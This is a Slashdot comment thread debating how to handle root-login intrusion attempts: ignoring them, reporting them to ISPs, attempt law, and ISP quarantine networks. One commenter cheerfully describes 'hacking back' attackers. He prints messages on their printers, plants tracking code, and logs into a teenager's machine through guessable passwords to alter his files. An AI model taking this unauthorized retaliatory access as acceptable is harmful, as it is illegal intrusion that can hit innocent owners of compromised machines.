      Nowadays, if I absolutely had to telnet to a box, I'd try to get a 'proxy' capable of accepting an ssh connection as close to the target box as possible This might include smail-mailing a modified knoppix disk with an RSA authorized_key on it (or a single floppy disk equivalent). At least that way I'd only have to worry about hostile machine on the same subnet as opposed to hostile machines on every hop inbetween.

      And I'd still do my damndest to get an ssh server installed on the box beforre I left.

      --
      Sometimes boldness is in fashion. Sometimes only the brave will be bold.
    31. Re:I tried to log in as root.. by thisissilly · · Score: 1

      Not a troll. Of course, back in the day (about 15 years ago), I didn't do this on subnets that had untrusted hosts on them, but yes, before ssh existed, and we used telnet or the r* commands (or SET HOST -- I almost forgot about DECNet!) to log in, and would su, with clear text passwords flying over the thinwire ethernet cables within the IT subnet. Remote root logins were disabled, generally.

      Later (but still pre-ssh), I used to use s/key to log in to my account when I would go off to a conference, to keep my login secure, and sudo to do root taskes from an untrusted conference terminal.

      These days I use my own laptop, and have ssh check host keys. But things used to be a lot looser, because you could trust other people on the Internet.

  10. Abuse by martingunnarsson · · Score: 5, Insightful

    When I had this problem I simply sent a mail to the ISP:s abuse-people. Most ISP has an e-mail address like abuse@theisp.com. Then they can send the guy a warning or whatever.

    --
    Martin
    1. Re:Abuse by UltiSkeeter · · Score: 1

      By in large, those times that I have sent stuff to 'abuse@whatever' with an event notice, I end up getting a spam flood. It's almost like I'm signing up for abuse! Very rarely have I got a reply that something was done...

    2. Re:Abuse by polished+look+2 · · Score: 1

      I recall someone behaving suspiciously on my webserver so I found out who had the IP address where the activity was originating. A few days later I received a reply and they said they were very thankful for my contacting them though I did not follow it up though I imagine it was a compromised server.

    3. Re:Abuse by Anonymous Coward · · Score: 0

      At least in Germany, trying to log into someone else's root account without permission and other intrusion attempts are not illegal. Succeeding however is illegal (StGB 202a). You should be careful when wording abuse-complaints, or they could easily backfire (StGB 187), and in this case the attempt to get someone disconnected is enough.

  11. Very Easy by kunjan1029 · · Score: 5, Insightful

    intrusion attempt >> /dev/null

    ignore it. forget it. script kiddiz...

    1. Re:Very Easy by TeVi · · Score: 5, Insightful

      (mod parent up!)

      Yup, just make sure your box is secure.

      Intrusion attempts happen unfortunately, with all the viruses, worms, etc. Just make sure your box won't get caught.

    2. Re:Very Easy by bstone · · Score: 5, Insightful

      Why not stop them before they get dangerous. Notify their ISP and get them a warning. Just "letting it go" will only encourage them to continue to keep on trying and learning until they figure out how to break in without being caught. A quick warning from their ISP might be just enough to scare them off, and word of mouth to their friends might help to keep others from thinking it's "cool" to attempt to break into computer systems.

    3. Re:Very Easy by Anonymous Coward · · Score: 5, Insightful

      Do as the good cops do: Arrest if there is enough evidence to lock them up, observe otherwise.

      Nothing encourages a script kiddy more than the feeling of invulnerability which you get from someone admitting that he knows what you're doing but can't do anything about it because you've not broken a law.

    4. Re:Very Easy by Kresh · · Score: 1

      How about a new moderation option:

      +1 Easy

      Cheers

    5. Re:Very Easy by BlackHawk-666 · · Score: 5, Informative

      Don't bother, the real crackers are probably usings some lusers box to launch the attack from. You're just warning the person who didn't secure their box, and they're not likely to understand why you are telling them they are attacking your box.

      --
      All those moments will be lost in time, like tears in rain.
    6. Re:Very Easy by essreenim · · Score: 2, Insightful

      I agree that you shouldn't worry about reporting them all, but it would be good to randomly report some of them - the unlucky kiddies?

      Also, bare in mind that some of these attempts may be made by real crackers that want to use your box as a remote box to launch attacks.

      Who knows, maybe in the future all servers and clients will be rigged with honey pots!!

    7. Re:Very Easy by Anonymous Coward · · Score: 2, Insightful

      Only go after them for an arrest if you have good reason to think that they mean you harm. A 12 year old trying to log in as root with no password is harmless, but turning them in can cause so much harm.

    8. Re:Very Easy by jstave · · Score: 5, Insightful

      But isn't that, right there, a good reason to let them know? If it lets someone know that their security has been compromised, they can take action to close the hole.

    9. Re:Very Easy by ishmaelflood · · Score: 4, Insightful

      Oh ho. So a kid who walks up to your car and tries the doorhandles is not guilty of anything untoward?

      Sorry, he needs a boot up the arse.

      He doesn't need to be sent to jail, he DOES need to be reminded that we'd rather he stopped being a fuckwit.

    10. Re:Very Easy by Anonymous Coward · · Score: 0

      Nothing encourages a script kiddy more than the feeling of invulnerability which you get from someone admitting that he knows what you're doing but can't do anything about it because you've not broken a law.

      I'm curious as to where the law stands in the US with respect to probing. One of the students at a major university in the southwestern US I worked at started port scanning the hell out of off-campus IP addresses and was told basically that he was breaking the law right there.

      IANAL but I suppose that if you hit a company with an in-house legal department and the will, they could go after you for login attempts, probes, etc under the veil that they are being "attacked".

    11. Re:Very Easy by jhoffoss · · Score: 4, Insightful
      Unless you break into each zombie manually, dezombify them, and add a readme.txt to the user's desktop, they'll never find out.

      ISPs don't really roll this information back very often, because it just takes them too long, and there's too many.

      It'd be nice if more ISPs were more responsible with this, though. Something like vlan'd users get port scanned/vuln. scanned upon connection, and once passed, they're allowed onto the big bad net. Of course then everyone on /. would complain of privacy concerns...

      --
      Linux: The world's best text-adventure game.
    12. Re:Very Easy by invenustus · · Score: 3, Insightful

      Sorry, he needs a boot up the arse.

      Agreed. But what he doesn't need is a legal "boot up the arse" that will haunt him for the rest of his life. The trick is giving him the former without the latter.

      --
      grep -ri 'should work' /usr/src/linux | wc -l
    13. Re:Very Easy by IANAAC · · Score: 2, Interesting
      Agreed. But what he doesn't need is a legal "boot up the arse" that will haunt him for the rest of his life. The trick is giving him the former without the latter.

      So, you convince his ISP to issue a "You're no longer welcome here because you agreed to an AUP that forbids what you were trying to do" to him.

      Unfortunately, ISPs are bogged down with requests like these, so probably not much will/can be done realistically.

    14. Re:Very Easy by Anonymous Coward · · Score: 0

      Why doesn't he need a boot in the ass? Act like a fuckwit, get treated like a fuckwit.

      If more of the script monkeys got prosecuted on the first offense, more would get the idea it isn't acceptable behavior.

    15. Re:Very Easy by orangesquid · · Score: 4, Insightful

      Not if your car is a webserver. That's like having a car with a big sign that says "LOOK IN THE WINDOWS! THERE'S COOL STUFF INSIDE THIS CAR!" Of course some people are bound to try the handle, at least to get a closer look. I attempt anonymous ftp logins and try /pub URLs on webservers all the time, as well as ascending to the parent directory and such. Sometimes I find some really neat stuff that way. I'm not about to attempt a root login, but, it's human nature to explore and try things which may or may not be OK, unless there's obvious immediate harm. If all humans were extremely cautious and thought hard about consequences and ethics, the US would not exist, and the natives would still be abundant.

      --
      --TheOrangeSquid Is it any wonder things seem so awry? We swim in a sea of confusion and don't have to think to survive
    16. Re:Very Easy by PReDiToR · · Score: 1, Insightful

      Run for office - I'll vote for Common Sense like that.

      The thing is, all these voters seem to think that a policeman giving their kid a clip round the ear is a bad thing. Hence kids stand and mouth off at policemen because they have no respect for someone without the power to actually do anything.

      --

      Do not meddle in the affairs of geeks for they are subtle and quick to anger
    17. Re:Very Easy by headblur · · Score: 1

      it won't haunt him for the rest of his life, if he's in the States and under 18. Juvenile records are sealed at 18.

    18. Re:Very Easy by Sgt+York · · Score: 5, Insightful
      He (the skiddiot case) may need it, but no one can give him that under current law. So, you observe and wait.

      To run with the analogy, if a cop sees a kid going down a row of cars testing door handles, he won't just run out and arrest him. The cop will wait until the kid comes across an unlocked door, rummages through the car, and takes something. Then the cop will arrest him. The cop waits because until the kid takes something, it's not a clear cut case. Sure, the kid is doing wrong, but the cop doesn't have enough ammo to really get him. Some people might take a "no harm, no foul" attitude.

      If I was 12 and got caught doing something dumb like trying to log in as root like that, I'd just counter with the defense that I got the IP address wrong. "Oh, that waas your server? My buddies must have been playing a joke on me...he said that was his machine." I'd most likely get off, and walk away with a feeling that I was untouchable on the net. Wait until you actually have something to scare them with, then nail 'em.

      --

      There is a reason for everything. Sometimes that reason just sucks.

    19. Re:Very Easy by Anonymous Coward · · Score: 0

      ISP's have neither the time or desire to bother with this. From what I've seen unless your email comes from CERT it gets deleted.

    20. Re:Very Easy by Aeiri · · Score: 1

      Yes, but how would the people that AREN'T allowed supposed to update their computer then? They have to download updates from the internet.

    21. Re:Very Easy by CAlworth1 · · Score: 1

      Damn it! I'm 19 now! I guess I waited too long!

      (speaking of waiting, now waiting for my 20 second to be up...)

    22. Re:Very Easy by mpcooke3 · · Score: 1

      Don't be stupid.

      Users don't read readme.txt files.

    23. Re:Very Easy by Anonymous Coward · · Score: 0

      Yeah, cuz that's the best thing to teach kids, might makes right. Heck why stop w/ kids, during a routine speeding ticket stop maybe the cop should give you a shot of pepper spray since you have probably done something wrong.

    24. Re:Very Easy by networkBoy · · Score: 2, Interesting

      Agreed. But what he doesn't need is a legal "boot up the arse" that will haunt him for the rest of his life. The trick is giving him the former without the latter.


      Exactally. What I've tended to do is when I see an obvious script kiddie hitting my server over and over (with the same damn script like it'll work the second/third/tenth time) is hack 'em back. I realize this only works if you catch them in the act, else you may hit someone else, but my general preference is to print the following to their printer:

      "Hey Cockbite: If you're going to try and hack someone, pick an admin who won't hack back"

      All in all it's harmless, but hopefully gives them the hint that they're being stupid. Also I've been known to drop in a bug that lets me know their current IP address so I can print the above message randomly for a month or so. Let them explain to mom and dad WTF is going on! Way better results than ruining their life with the cops. ;)

      -nB

      --
      whois gawk date unzip strip find touch finger mount join nice man top fsck grep eject more yes exit umount sleep dump
    25. Re:Very Easy by sbergstrom · · Score: 0, Redundant

      Certainly we ought not deal consequences that could haunt someone for the rest of their life. What other kind of real consequence is there? People are willing to risk a slap on the wrist; if they realize that their actions can affect the balance of their personal and professional lives, they might more seriously consider NOT doing the things that they shouldn't be doing in the first place.

      --

      Love, Stu
    26. Re:Very Easy by tacocat · · Score: 1

      yes, but the difference between you and the fuckwit testing the login passwords is you are not attempting to impersonate anyone you are not (ie, root). You are simply walking around the car on the readily accessable avenues of access (ie: ftp, http) which are intended for public access or general consumption as differs from private access (locked door) requiring a login username and password (as a key is to a ssh/telnet account)

    27. Re:Very Easy by fubar1971 · · Score: 1

      A quick warning from their ISP might be just enough to scare them off, and word of mouth to their friends might help to keep others from thinking it's "cool" to attempt to break into computer systems.

      Or in my experiences, a quick word from their ISP, just pisses them off and they notify all of their friends, which now are pissed off, and then they tell everone in the IRC room, which in turn piss them off. Now all of these pissed off script kiddies all are attacking your site, instead of a single bored assh*le that has nothing better to do with their time. IMHO, just keep monitoring it, and if an intrusion trully happens, then save all of your logs and call the Feds.

    28. Re:Very Easy by mustangsal66 · · Score: 3, Insightful

      Do you have any idea how clueless the average broadband user is?

      Do you have any idea the cost involved in setting up the system you have described in equipment, admin time, programmer time, etc...?

      Who's responsible for fixing the vulnerabilities once found? Who's responsible if the vuln check actually harms the users computer or data? How do you prove it?

      The ISPs are not some large benevolent entity. They're init to make a profit. Sorry, yes, they like money. Numerous phone calls to techsupport deal with questions that start, It used to work when I had AOL. Yeah we all know AOL sucks, but apparently they make money. Cusomters don't want to hear, this isn't AOL, this is a real internet provider, they want to surf their p0rn, and chatrooms. If fixing a customer will loose the customer..they're not going to do it. It's bad business sense.

      Guess who gets the cost of fixing these customers, you do as the consumer.

      Now balance it. The ISP deals with a handful of customers (out of their total subscriber base), or increases costs to all... You try to explain to grandma why her internet bill increased by 10%.

      --
      Why worry? Each of us is wearing an unlicensed "nucular" accelerator on his back.
      Sig changed for readability by G.W.
    29. Re:Very Easy by kbonin · · Score: 1

      That's the public myth. The reality is different. If you have a juvenile criminal record, it may be sealed from the public, but it is not purged from the court system. Unless you fight to have it purged, it can be used against you as an adult. I have a friend who learned this the hard way.

    30. Re:Very Easy by Enoch+Zembecowicz · · Score: 1

      Before I changed jobs a few months back I was the "abuse guy" (among other things) for the ISP I work for. I wrote a script that ran nmap, amap, and mothra on each IP in a text file and emailed me the results. I'd go through the day's complaints, make my list, and within a few hours I'd have at least five zombied boxes who's owners suddenly found themselves without an internet connection.

      --
      "Who's going to believe a talking head?" - Herbert West
    31. Re:Very Easy by cdrudge · · Score: 2, Interesting

      If it's the same person multiple times, yes. If it's one person once, ignore it.

      I know that I occasionally forget who I'm connecting into and try to login as root out of habit but then realize where I'm at. Using your example, it would be like walking towards a car in the parking lot that looks like yours and trying the handle...but just as you do realizing that it's not your car.

    32. Re:Very Easy by dillee1 · · Score: 1

      That probably won't make them notice as well.

      Many ID107's desktop are already filled with hundreds of icons, plus they trend to use distracting wallpaper as well.

    33. Re:Very Easy by RovingSlug · · Score: 4, Insightful
      So a kid who walks up to your car and tries the doorhandles is not guilty of anything untoward?

      I grew up in conservative Oklahoma. As a teenage kid, I was walking across a large parking lot with my friend and his girlfriend to a movie theater. My friend had long hair, so that probably tipped us off as obvious hoodlums, justifying some person calling the police to report "suspicious activity" of some kids messing with cars.

      Maybe if we had been doing anything more than walking it would have been a good lesson. As it was, it just taught me the world definitely has scared, intolerant jackasses.

      Before advocating low tolerance and hair-trigger fingers, consider the sociecty you're creating for everyone, not just the criminals and would-be criminals.

    34. Re:Very Easy by networkBoy · · Score: 1

      **responding to your flamebait**
      Think whatever you want. But it really is amazing how many script kiddies don't have their machines (often Windows) locked down.
      -nB

      --
      whois gawk date unzip strip find touch finger mount join nice man top fsck grep eject more yes exit umount sleep dump
    35. Re:Very Easy by jhoffoss · · Score: 1
      Universityies are setting these systems up all over. They don't require much administration. First, you present the user with instructions for each OS, and run a web-based AV scanner. Online AV scanners are available now, for free. Next, you require they run WindowsUpdate to make sure they're patched, and run a small script to make sure all the latest patches (or at least criticial patches) are installed. Then you open microsoft.com so WindowsUpdate can be run, and symantec (if viruses are found).

      The system then dynamically allows the user past this protected vlan, and perhaps require them to go through the process once a month, or every few months.

      In the meantime, if a PC becomes infected with something like blaster, it becomes blatantly obvious to the ISP, so have scripts setup that pop the uesr back to the protected vlan, and inform them of why that happened.

      This is nothing but forcing moronic users to responsibly manage their PCs, to save the ISP and other users time and money.

      --
      Linux: The world's best text-adventure game.
    36. Re:Very Easy by Anonymous Coward · · Score: 0
      "Universityies are set..."

      whoa, what the hell happened there...

    37. Re:Very Easy by jhoffoss · · Score: 1

      You can set a vlan up to allow specific domains, like *.microsoft.com. University networks are implementing systems that do this to cut down on the effects of viruses like blaster.

      --
      Linux: The world's best text-adventure game.
    38. Re:Very Easy by Xenographic · · Score: 1

      Been there, done that.

      Log everything (especially if you know his online handle--go Google him).

      Once you have something to bust him for, send those logs and a selection of others & whatever you found about him mouthing off about how he's such a great hacker from Google, then forward the lot to the ISP.

      Since I don't do this very often, and I presented a credible enough case, I have a good success rate for having them booted.

    39. Re:Very Easy by Anonymous Coward · · Score: 0

      if only... *sigh*

    40. Re:Very Easy by jfdawes · · Score: 2, Insightful

      Don't you think there's something wrong with a society where a cop watches you doing the wrong thing and takes no proactive action to protect and serve?

      What's wrong with the cop stopping the kid, asking his name and address and generally letting him know that his actions are monitored and he's on the verge of crossing the line.

      If no-one ever tells you where the line is, how do you know when you've crossed it?

    41. Re:Very Easy by LuxFX · · Score: 1

      Not if your car is a webserver. That's like having a car with a big sign that says "LOOK IN THE WINDOWS! THERE'S COOL STUFF INSIDE THIS CAR!"

      But, going back to the original question, we're talking about people trying to access the server as 'root'. Sure the server is like a car with a sign begging people to look in the windows. But what we're talking about is somebody trying to use a homemade key to actual enter the car, and not just look at the windows.

      Another analogy: a display shelf in a jewelry store. Everything in there is meant to be looked at. But if you try to get behind the counter to get at the stuff inside, you'll be stopped.

      --
      Punctanym: alternate spelling of words using punctuation or numerals in place of some or all of its letters; see 'leet'
    42. Re:Very Easy by Anonymous Coward · · Score: 0

      "intrusion attempt >> /dev/null

      ignore it. forget it. script kiddiz..."

      Then switch over to cartoon networks boomerang station...there's an all day Laff-A-Lypics marathon. Today Darl the Deceiver, Billy the Bushwhacker, afore-mentioned stript kiddiz and the resto the "Really Rottens" square off with the "Yogie Yahooies" and my fav the "Scoobie Doobies".
      I've been thinking which of the good guys belong with the Yogis or Scoobies, any ideas?

    43. Re:Very Easy by jhoffoss · · Score: 1

      My hat's off to you; I wish more ISPs were responsible in this manner.

      --
      Linux: The world's best text-adventure game.
    44. Re:Very Easy by Anonymous Coward · · Score: 1, Insightful

      It sounds wrong when you phrase it like that.

      "To protect..." is about the victims, not the offender. If the police is confident that they can intervene before harm is done, then it's ok to wait.

      The police watches because the kid full well knows that what he's doing is wrong. What the kid maybe doesn't realize is that he's being watched. Warning him at that point just makes the kid more cautious, but not wiser. The feeling of not getting away only remains if the cop can back up the wigging with something that the kid knows he can't talk himself out of. THEN, depending on the circumstances, the cop should make the punishment no more than the proverbial slap on the wrist, while making it clear that the next time won't be a walk in the park.

      I would really hate to live in a society in which we rely on the cops to tell kids where the line is. Don't parents teach their kids anything anymore?

    45. Re:Very Easy by IsaacW · · Score: 1

      Only if we also get "-1 Easier Said Than Done."

    46. Re:Very Easy by Sgt+York · · Score: 1
      Experienced, good cops will notice if the kid is a first timer or someone experienced. If it's someone that has broken into many cars before, then the person should be arrested and sent to jail. For that, you need to wait to get good evidence.

      If the kid is a first timer, some 15 year old on a dare or trying to impress his friends, most cops that I know would just scare the crap out of him. Take him to holding, make his parents come get him, etc. The kid is doing no real harm just pulling the handles, and the cop will stop him before he does any real harm. This is better in the long run, because when the kid is actually taking the item, he's probably scared and when he gets caught, will be terrified. You can be sure he'll never do it again. If he doesn't get to full-blown terror, you may or may not prevent the activity in the future. It's a lot better when the club you weild is real, instead of just imagined. If the kid that didn't steal calls your bluff, then once he gets off he will feel invulnerable, and do it again. Cops protect and serve society, not individuals.

      That's all debateable, though. The kicker for me was:

      If no-one ever tells you where the line is, how do you know when you've crossed it?
      Do you really think that the kid doesn't know that opening up someone's car door and taking something that doesn't belong to them is wrong? Is there anyone over the age of four who honestly does not believe that that is "over the line"?

      --

      There is a reason for everything. Sometimes that reason just sucks.

    47. Re:Very Easy by wdtj · · Score: 1

      We caught a hacker breaking (successfully) into our school network. Spent 2 days rebuilding things. Notified the FBI but their reply was that unless there was >$5000 damage, they wouldn't do anything. Get a firewall.

    48. Re:Very Easy by Sgt+York · · Score: 1

      That is outstanding. The only thing missing is to hijack their webcam to see the look on the kid's face when his printer kicks in and he dives for the network cable.

      --

      There is a reason for everything. Sometimes that reason just sucks.

    49. Re:Very Easy by Loconut1389 · · Score: 1

      Granted, but in this case its sort of apples and oranges. You were just walking in the parking lot.. in the analogy set up here, that would be more like connecting to other services (http) or something. So that would be some jackass admin calling up the FBI every time someone is legitimately using a part of his server (though not trying to use the unauthorized parts). What you experienced is annoying and the person who did it is probably a senior citizen and a) has nothing better to do and b) isnt used to kids with long hair and it incites the generation gap thing.. *shrugs*

    50. Re:Very Easy by Loconut1389 · · Score: 1

      Yeah, then they call your upstream and send logs. That's something I'd like to do, but its risky. For a lot of kids it'll shut them up, for some in this sue-happy world, that'll just give them ammunition and they may end up owning your server in court.

    51. Re:Very Easy by Loconut1389 · · Score: 1

      its a little different at a corporation or university, they have AUP's that expressly prohibit that sort of thing.. often they have detection mechanisms in their routers and shutdown your port as well. In any case they were probably breaking the 'university law' at the least.. and at 'best' portscanning a ton of ips would be like testing every door in your neighborhood and probably has some legal protection against the activity.

    52. Re:Very Easy by Goobermunch · · Score: 2, Insightful

      Except that there's this great concept in American Law called "Attempt."

      Generally, the way it works is like this:

      If a defendant, acting with the intent otherwise necessary for the commission of a crime, take a substantial step toward completion of that crime, you're guilty of attempt.

      A substantial step is an action strongly corroborative of your intent to commit the crime.

      The kicker is that the substantial step need not be illegal.

      Thus, if a kid walks down a row of cars testing door handles, the prosecutor can make a good case for the intent to illegally enter one of those cars because he's trying all the doors (and therefore has a no legitimate interest in being inside any of them).

      --AC

    53. Re:Very Easy by networkBoy · · Score: 1

      In my case it's no problem. My server is a little dell box on a dynamic DNS and I already have a good rapor (sp?) with my ISP as I forward all my logs to them anytime there is a question of a TOS violation. So far in each case they've offically found no violation of the TOS as they are "only a transport provider" and privately I was told by one of their techs that my way was likely nearly the only way to sanction some of these script kiddies.

      Also as far as the court cases would go, their only actual loss was some paper and toner or ink. If it got that far I suppose I wouldn't have a problem repaying those losses :), besides it's hard to sue someone in another country as one of the most memorable people I got this way was in Germany, his machine had 3 accounts: admin, mother, father. PWD on admin was not very guessable, but it would seem he made everything easy for mom and dad. PWD's on those two acounts were the same as user name and had admin rights. Just goes to show that theese kiddies don't actually know much and are simply running canned scripts. I resisted the temptation to do any real damage to his filesystem, but I did twiddle some bits in his (obvious) warez/pr0n folder (little perl script to replace all those hot chicks with either the goats. guy or some random trans-gender stuff :-) )

      --
      whois gawk date unzip strip find touch finger mount join nice man top fsck grep eject more yes exit umount sleep dump
    54. Re:Very Easy by NanoGator · · Score: 2, Interesting

      "Oh ho. So a kid who walks up to your car and tries the doorhandles is not guilty of anything untoward?"

      No, he is not. I agree that he should be informed that it's not cool, but he doesn't need to have boot up his arse or to be called guilty of anything. Frankly, kids are curious. I've tried doorhandles before, it had nothing to do with me being up to no good. I was just curious if people really locked their cars.

      --
      "Derp de derp."
    55. Re:Very Easy by Sgt+York · · Score: 1
      Thus, if a kid walks down a row of cars testing door handles, the prosecutor can make a good case for the intent to illegally enter one of those cars because he's trying all the doors (and therefore has a no legitimate interest in being inside any of them).
      Sure, but what is the potential penalty for attempted B&E of a vehicle? IANAL, but I'm sure it's not much of a threat to hold over someone's head. At least, nothing in comparison to actual B&E (or just E, I guess) with theft. And I'm pretty sure it's hard to prove intent without action. A really inventive lawyer could probably argue that the kid was attempting something else entirely (to a gullible jury). If, however, the kid removes something from a car not his own, intent is obvious. Or at least a lot easier.
      --

      There is a reason for everything. Sometimes that reason just sucks.

    56. Re:Very Easy by orangesquid · · Score: 1

      Hmmm, good point. It's a lot easier to screw around with computers, though. Plus, many people don't take them too seriously. I mean, after all, it's just a hunk o' machinery, right? :P It's just like a microwave that talks to other microwaves, how much harm can you possibly do? ;)

      --
      --TheOrangeSquid Is it any wonder things seem so awry? We swim in a sea of confusion and don't have to think to survive
    57. Re:Very Easy by Can · · Score: 1

      Do you have any idea the cost involved in setting up the system you have described in equipment, admin time, programmer time, etc...?

      About one server and about three days of programming, plus some regular maintenance. We do this very thing at this university... A machine gets connected to the network, it's scanned for vulnerabilities and viruses. If it's infected, it'm moved to a VLAN where no matter what URL they try, they get a page telling them to fix their machine. Once the machine is fixed, it's automatically allowed back on the network.

      It's not that complex, and it saves us both hassle and bandwidth.

    58. Re:Very Easy by Chazman · · Score: 5, Interesting
      Oh ho. So a kid who walks up to your car and tries the doorhandles is not guilty of anything untoward?

      No. Trying a door handle does not imply mal-intent. It's the response when a door handle actually works that matters. I'll give you an anecdote. I was arriving at a semi-nice restaurant in a somewhat out of the way area of an otherwise nice town. Parking was scarce, so I had to park on a tiny unlit side-street. Walking toward the restaurant from my car, I saw another car on the street with its dome light on. It was obvious from a reasonable distance that there was no one in the car, but there was a pocketbook left on the front seat. Being a good sumeritan, I said "that won't do -- the pocketbook will get stolen, and the dome light will drain the battery". So I tried the door handle. To my surprise, it opened. I quickly turned to dome light off, closed the door again, and walked away. Turns out this was a sting. There had been a bunch of thefts from cars in the area recently, and this being a good town, the cops had enough time to set up a honeypot to try to catch the perp. They were quite chagrined to find someone go for the bait for an entirely altruistic reason -- to prevent a stranger from becoming the dual victim of a theft and a dead battery. Maybe I took a risk by trying that door handle and attempting to do some good. But how would you know if you deign to put a boot up my arse the instant I touch the doorhandle?

      Perhaps the analogy doesn't port over all that well to scans of TCP ports, but it wasn't I who began that analogy; I'm just answering it.

      --
      -----Chaz
    59. Re:Very Easy by whittrash · · Score: 1

      "print the following to their printer"

      Uhh, aren't you providing evidence that you just did an illegal act if you use their printer.

    60. Re:Very Easy by WNight · · Score: 3, Insightful

      "They made it more secure - the rate increase pays for the guy who runs the security"

      Doesn't seem too hard, but maybe my grandma is smarter than yours.

      This kind of security is well worth it. ISPs that take a few basic precautions sit back and laugh as their competitors get ravaged by the worm of the week, while zombied windows boxes spam everyone and get the whole ISP blackholed, etc.

      You pay one person to keep up on the script-kiddy tools and you block the ports they tend to use, or program your router to drop certain scanning packets, making it look like the computers you host are immune to the bug. Trivial stuff really.

      If you want to get fancy you can try some sort of warning system that gives you an overview of what your users are doing. If you see that 1/3 of your users are loading a webpage at the same company you might be witnessing a DDoS attack, if one address is scanning your IP range you might want to start dropping their packets.

      A little bit of forethought makes everything run much smoother, once you start taking precautions you'll find that despite the cost of the employee time you'll save money overall. Not in a way that short-sighted management (the type who don't understand backups and standby servers) will understand though, so you need to be at a clued company or be good at making proposals.

    61. Re:Very Easy by jfdawes · · Score: 1

      Do you really think that the kid doesn't know that opening up someone's car door and taking something that doesn't belong to them is wrong? Is there anyone over the age of four who honestly does not believe that that is "over the line"?


      Of course not. However, there are people who are in denial about it and will try to justify it with a variety of reasons. There are also people who have been doing similar things since before they were four because no-one ever bothered telling them not to.

      A number of people have already made the point that if this is the first time they have done it and they get caught, there's a chance they will be scared/guilty enough to not do it again.
    62. Re:Very Easy by whittrash · · Score: 1

      The cop will wait until the kid comes across an unlocked door, rummages through the car, and takes something. Then the cop will arrest him

      That depends, if the cop just wants to scare the kid straight, he will go up to him, explain that if he catches him messing around he will kick his ass and send him to jail and that he knows his name and where he lives. Hopefully the kid will get the message, a crime will not be committed and the kid will no become a criminal.

    63. Re:Very Easy by whittrash · · Score: 1

      A good prosecutor can convict anyone, don't screw with the cops, if they really want you to burn, you will burn. And as you may know, the prison version of IANAL is simply ANAL. This is why most people plead out 90% of the time.

    64. Re:Very Easy by Sgt+York · · Score: 1
      They may justify it in their minds, but they still know that it is wrong. And, if someone has rationalized and justified theft in their own mind, then that person truly needs rehabilitation. That can be done effeciently by forcibly scaring the crap out of them.

      The cop cannot, should not, and does not assume that the person has had this happen to them. It is, unfortunately, becoming more and more prevelant, but it is still by no means so frequent as to be a factor in this decision. Blaming society for crimes is an ancient technique. It doesn't work, and it shouldn't work.

      The kid's real problem in this scenario is that no one has ever taught him/her personal responsibility; that you are responsible for your own decisions and actions, and that you are accountable for them. Informing them that the reason they steal is because their parents never taught them better, shifts responsibility from the offender to someone else. This does not foster an attitude of personal responsibility. This is not to say the parents are blameless. They screwed up (not) raising their kid. But to help the kid, you have to put the responsilbility on his shoulders, and no one elses.

      --

      There is a reason for everything. Sometimes that reason just sucks.

    65. Re:Very Easy by Elvisisdead · · Score: 1

      Or not arrest if the resources aren't available. Also not arrest if damages don't exceed the threshold. Do observe, though. Always observe and take notes.

      --

      "Want in one hand and spit in the other and see which one fills up first." - My Dad
    66. Re:Very Easy by McCrapDeluxe · · Score: 1

      I recently saw a police report where two people were arrested for prowling for looking in car windows.

    67. Re:Very Easy by Anonymous Coward · · Score: 0

      people read the readme's ?

      *shock*

    68. Re:Very Easy by groot · · Score: 1

      Notify their ISP and get them a warning.


      I have tried that. It seems ISP's don't want to get involved otherwise they might become "responsible" for dealing with it, so they take the tact that they are merely "common carriers" and not responsible for any wrongdoing on anyones part, just like ma-bell; they are not responsible for nerdowells plotting their criminal intent by using phones.

      As long as you are paying your ISP his due, they could not careless what you are doing (except maybe using too much bandwidth).

      --laz
      --
      "Just remember, it takes a village idiot." -- The Motley Fool.
    69. Re:Very Easy by neuroticia · · Score: 1

      There's a difference between the real world and the digital. In the real world, cops base their discrimination on looks, clothing, etc. There is some validity to that, but very little especially as certain things are just plain dumb (long hair for example, or the wearing-of-turbans)

      In the digital world, it's based on something else. The attempt of an attack. Where a "normal" person might just cruise around looking for FTP servers with anonymous logins or crusing the web tree looking for fun stuff. In this case, it's very easily argued that since it wasn't secured it was considered public. I mean. c'mon, anon FTP? If you really didn't want people logging in.. anonymously, wouldn't you disable that feature of your FTP server? And drop some index pages into your folders on the web server (or disable listing of directories)

      On the other hand, there is genuine suspicious behavior--akin to trying to pick a lock with a credit card. The attempt to exploit specific vulnurabilities. Here the "Well gee, I thought it was public" or "Well, geee if it wasn't public why didn't you secure it?" argument falls to pieces. The "login as root" also doesn't fly as far as being a legitimate thing to be attempting. It's an obvious attempt to do something that you should not be doing.

      I believe there are laws against randomly walking around and attempting to pick locks. Why not laws against attempting to exploit vulnurabilities? I mean. If your friend says "That's my house, go pick the lock and bring me a beer" and you do and it's not his house.. is that a legit defense? If your buddy says "Go r00t my box".. I mean. Hey. C'mon.

    70. Re:Very Easy by hesiod · · Score: 1

      > What's wrong with the cop stopping the kid, asking his name and address

      Because that is infringing on his rights. Y'know, that whole Bill of Rights thing... 4th Amendment? "The right of the people to be secure in their persons," etc.

    71. Re:Very Easy by networkBoy · · Score: 1

      Yes, but I'm not worried too much about that.
      -nB

      --
      whois gawk date unzip strip find touch finger mount join nice man top fsck grep eject more yes exit umount sleep dump
    72. Re:Very Easy by DM9290 · · Score: 1

      He (the skiddiot case) may need it, but no one can give him that under current law. So, you observe and wait.

      Under current law (in many or most jurisdictions), attempting to commit a crime is also a crime. It may have a less severe punishment than a successful crime but it is a crime none the less.

      To run with the analogy, if a cop sees a kid going down a row of cars testing door handles, he won't just run out and arrest him. The cop will wait until the kid comes across an unlocked door, rummages through the car, and takes something. Then the cop will arrest him. The cop waits because until the kid takes something, it's not a clear cut case. Sure, the kid is doing wrong, but the cop doesn't have enough ammo to really get him. Some people might take a "no harm, no foul" attitude.

      The "no harm, no foul" attitude is not part of the criminal justice system. All sorts of people are jailed without having actually directly caused harm.

      The cop has a duty to arrest someone he sees commiting a crime (even the crime of attempt). Allowing someone to attempt theft and not arresting them but waiting until they actually succeed, would be akin to watching a fight and allowing the fight to continue in the hopes that someone is really hurt badly, so that rather than merely getting a simple assault charge he can nail someone for aggravated assault or perhaps murder.

      Unfortunately this is probably the attitude of most cops, and this attitude is misplaced.

      Some studies show that that the probability of being caught has as great or greater effect than the severity of punishment on deterrence.

      So what if the kid only gets a slap on the wrist?
      In all probability the person attempting to commit theft will plead guilty, they get a slap on the wrist, perhaps some counseling and know that the next time they try another stunt the punishment will be worse.

      Being punished (even in a minor way) may just be the wake up call needed to steer him away from crime.

      In all probability a jury would convict someone of attempted theft in such a case or computer hacking.

